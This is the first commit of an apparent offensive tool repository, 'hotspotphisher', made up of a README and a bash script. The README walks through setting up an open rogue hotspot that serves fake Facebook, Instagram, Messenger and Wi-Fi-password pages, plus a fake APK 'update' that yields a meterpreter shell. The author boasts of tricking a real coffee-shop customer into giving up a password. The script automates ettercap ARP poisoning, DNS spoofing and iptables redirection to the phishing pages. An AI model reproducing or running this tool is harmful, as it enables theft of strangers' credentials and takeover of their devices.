the first commit

README.md

@@ -0,0 +1,35 @@
+**NB:** I made this basic script and tested it on Kali Nethunter.<br />
+You don't need a second wireless interface or monitor mode. wlan0 is enough. <br />
+# 1. **Scenario 1: facebook phishing**
+<img src="images/facebook.jpg" width="200">
+    Turn your smart phone's wifi Hotspot on and create an OPEN wireless hotspot (no password).<br />
+    Open a terminal in kali nethunter and type: <br />
+    chmod +x hotspotphisher.sh && ./hotspotphisher.sh <br />
+    Open a second terminal and type: <br />
+    ifconfig (check your ip, usually 192.168.43.1) <br />
+    cd /var/www/html/facebook/ && php -S 192.168.43.1:8080 <br />
+As soon as you connect to the fake hotspot, a splash screen opens automatically asking for facebook credentials.<br />
+
+# 2. **Scenario 2: fake plugin update with android APK**
+<img src="images/backdoor.jpg" width="200">
+    Create an android payload (update.apk). <br />
+    Put the update.apk file in "backdoor" folder after you unzip it.<br />
+    Open a terminal and type:<br />
+    cd /var/www/html/backdoor/ && php -S 192.168.43.1:8080 <br />
+    Open a second terminal and type ./hotspotphisher.sh <br />
+When the victim connects to the fake hotspot, he will get a splash screen asking him to download a necessary plugin update (update.apk) <br />
+If he installs the apk, you'll get a meterpreter shell. <br />
+
+# 3. **Scenario 3: Wifi Password Pop up**
+
+<img src="images/wifi.jpg" width="200">
+In this scenario, you can name your hotspot the same name as any wifi network around you, and if the victim connects to it by mistake, he's greeted with a pop up login box that asks for the wifi password.<br />
+I tried this in a coffee shop and it worked great. Some customers knew the wifi password of the coffee shop but I didn't know it, and one of the customers fell for the trick and gave me the password without knowing it. <br />
+
+**ALL SCENARIOS WORK PERFECTLY USING MY NEXUS 5 KALI NETHUNTER.**
+
+You can access the logged credentials in the browser. Just type:<br />
+**http://192.168.43.1:8080/logger.html** <br />
+
+# **The other scenarios: instagram, messenger (etc...) don't need to be explained.** 
+          

hotspotphisher.sh

@@ -0,0 +1,145 @@
+#!/bin/bash
+
+#COLOURS
+white="\033[1;37m"
+grey="\033[0;37m"
+purple="\033[0;35m"
+red="\033[1;31m"
+green="\033[1;32m"
+yellow="\033[1;33m"
+purple="\033[0;35m"
+cyan="\033[0;36m"
+cafe="\033[0;33m"
+fiuscha="\033[0;35m"
+blue="\033[1;34m"
+nc="\e[0m"
+y="Y"
+n="n"
+e="ENTER"
+
+echo -e "$green"
+
+cat << "EOF" 
+           _ _  ___  ___  _    _      _             
+          | | |/ __>| . \| |_ <_> ___| |_  ___  _ _ 
+          |   |\__ \|  _/| . || |<_-<| . |/ ._>| '_>
+          |_|_|<___/|_|  |_|_||_|/__/|_|_|\___.|_|  
+EOF
+echo -e "$nc"
+
+printf "                            -+- \e[0m\e[1;77mCoded by: @HxRofo\e[0m -+-\n"
+printf "\n"
+
+sleep 5;
+
+# PACKAGES
+echo -e  "$red[$green*$red]$white Installing Required Packages ... $nc"
+apt update;
+apt install php -y;
+apt install ettercap-text-only -y;
+apt install unzip -y; 
+sleep 2;
+clear
+
+#ATTACK SCENARIOS
+
+echo -e  "$red[$yellow*$red]$yellow Choose a Scenario: \n $nc"
+function main()
+{
+    while :
+    do
+
+        echo -e "$red[$green"1"$red]$green Fake Facebook                                     \n"
+        echo -e "$red[$green"2"$red]$green Fake Update                 \n"
+        echo -e "$red[$green"3"$red]$green Fake Wifi                 \n"
+        echo -e "$red[$green"4"$red]$green Fake Instagram                 \n"
+        echo -e "$red[$green"5"$red]$green Fake Messenger                                     \n"
+        echo -e "$red[$green"6"$red]$green Exit                 \n"
+        read -p " Select>: " option
+        echo 
+
+        case "$option" in 
+		1)  echo -e $green "[✔] Fake Facebook"
+echo
+echo -e  "$red[$green*$red]$white Moving Facebook Files to /var/www/html/ ... $nc" ;
+unzip -o facebook.zip -d /var/www/html/ ;
+sleep 2;
+echo -e  "$red[$green*$red]$green Editing etter.dns ... $nc"
+echo "* A $IP" > /etc/ettercap/etter.dns ;
+echo -e  "$red[$green*$red]$green Done $nc" 
+clear && sleep 2;
+echo -e  "$red[$green*$red]$green Starting iptables $nc"
+iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080 ;
+clear && sleep 2;
+echo -e  "$red[$green*$red]$green Starting ettercap $nc"
+ettercap -Tqi wlan0 -M arp:remote -P dns_spoof /// ;;
+
+		2)  echo -e $green "[✔] Fake Update"
+
+echo -e  "$red[$green*$red]$white Moving Backdoor Files to /var/www/html/ ... $nc"                
+unzip -o backdoor.zip -d /var/www/html/
+sleep 2
+echo -e  "$red[$green*$red]$green Editing etter.dns ... $nc"
+echo "* A $IP" > /etc/ettercap/etter.dns ;
+echo -e  "$red[$green*$red]$green Done $nc" 
+clear && sleep 2;
+echo -e  "$red[$green*$red]$green Starting iptables $nc"
+iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080 ;
+clear && sleep 2;
+echo -e  "$red[$green*$red]$green Starting ettercap $nc"
+ettercap -Tqi wlan0 -M arp:remote -P dns_spoof /// ;;
+
+		3)  echo -e $green "[✔] Fake Wifi"
+echo
+echo -e  "$red[$green*$red]$white Moving Wifi Files to /var/www/html/ ... $nc" ;
+unzip -o wifi.zip -d /var/www/html/ ;
+sleep 2;
+echo -e  "$red[$green*$red]$green Editing etter.dns ... $nc"
+echo "* A $IP" > /etc/ettercap/etter.dns ;
+echo -e  "$red[$green*$red]$green Done $nc" 
+clear && sleep 2;
+echo -e  "$red[$green*$red]$green Starting iptables $nc"
+iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080 ;
+clear && sleep 2;
+echo -e  "$red[$green*$red]$green Starting ettercap $nc"
+ettercap -Tqi wlan0 -M arp:remote -P dns_spoof /// ;;
+
+		4)  echo -e $green "[✔] Fake Instagram"
+echo
+echo -e  "$red[$green*$red]$white Moving Instagram Files to /var/www/html/ ... $nc" ;
+unzip -o instagram.zip -d /var/www/html/ ;
+sleep 2;
+echo -e  "$red[$green*$red]$green Editing etter.dns ... $nc"
+echo "* A $IP" > /etc/ettercap/etter.dns ;
+echo -e  "$red[$green*$red]$green Done $nc" 
+clear && sleep 2;
+echo -e  "$red[$green*$red]$green Starting iptables $nc"
+iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080 ;
+clear && sleep 2;
+echo -e  "$red[$green*$red]$green Starting ettercap $nc"
+ettercap -Tqi wlan0 -M arp:remote -P dns_spoof /// ;;
+
+		5)  echo -e $green "[✔] Fake Messenger"
+echo
+echo -e  "$red[$green*$red]$white Moving Messenger Files to /var/www/html/ ... $nc" ;
+unzip -o messenger.zip -d /var/www/html/ ;
+sleep 2;
+echo -e  "$red[$green*$red]$green Editing etter.dns ... $nc"
+echo "* A $IP" > /etc/ettercap/etter.dns ;
+echo -e  "$red[$green*$red]$green Done $nc" 
+clear && sleep 2;
+echo -e  "$red[$green*$red]$green Starting iptables $nc"
+iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080 ;
+clear && sleep 2;
+echo -e  "$red[$green*$red]$green Starting ettercap $nc"
+ettercap -Tqi wlan0 -M arp:remote -P dns_spoof /// ;;
+
+		6)  echo -e $yellow " Exiting Script. Good Bye !!"
+sleep 3;
+exit 0 
+;;
+
+        esac 
+    done
+}
+main